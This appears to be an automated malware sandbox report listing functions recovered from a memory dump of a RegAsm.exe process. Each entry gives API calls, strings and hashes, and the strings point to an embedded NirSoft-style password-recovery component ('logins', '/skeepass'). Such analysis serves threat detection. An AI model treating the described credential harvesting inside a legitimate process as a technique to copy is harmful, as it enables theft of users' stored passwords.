                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                • String ID: logins$null
                                                                                                                                                                                                • API String ID: 2148543256-2163367763
                                                                                                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                • String ID: ---
                                                                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1010922700-0
                                                                                                                                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                                                                • Opcode ID: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                • String ID: A
                                                                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                • API String ID: 4139908857-2887671607
                                                                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                • String ID: 4$h
                                                                                                                                                                                                • API String ID: 4019544885-1856150674
                                                                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
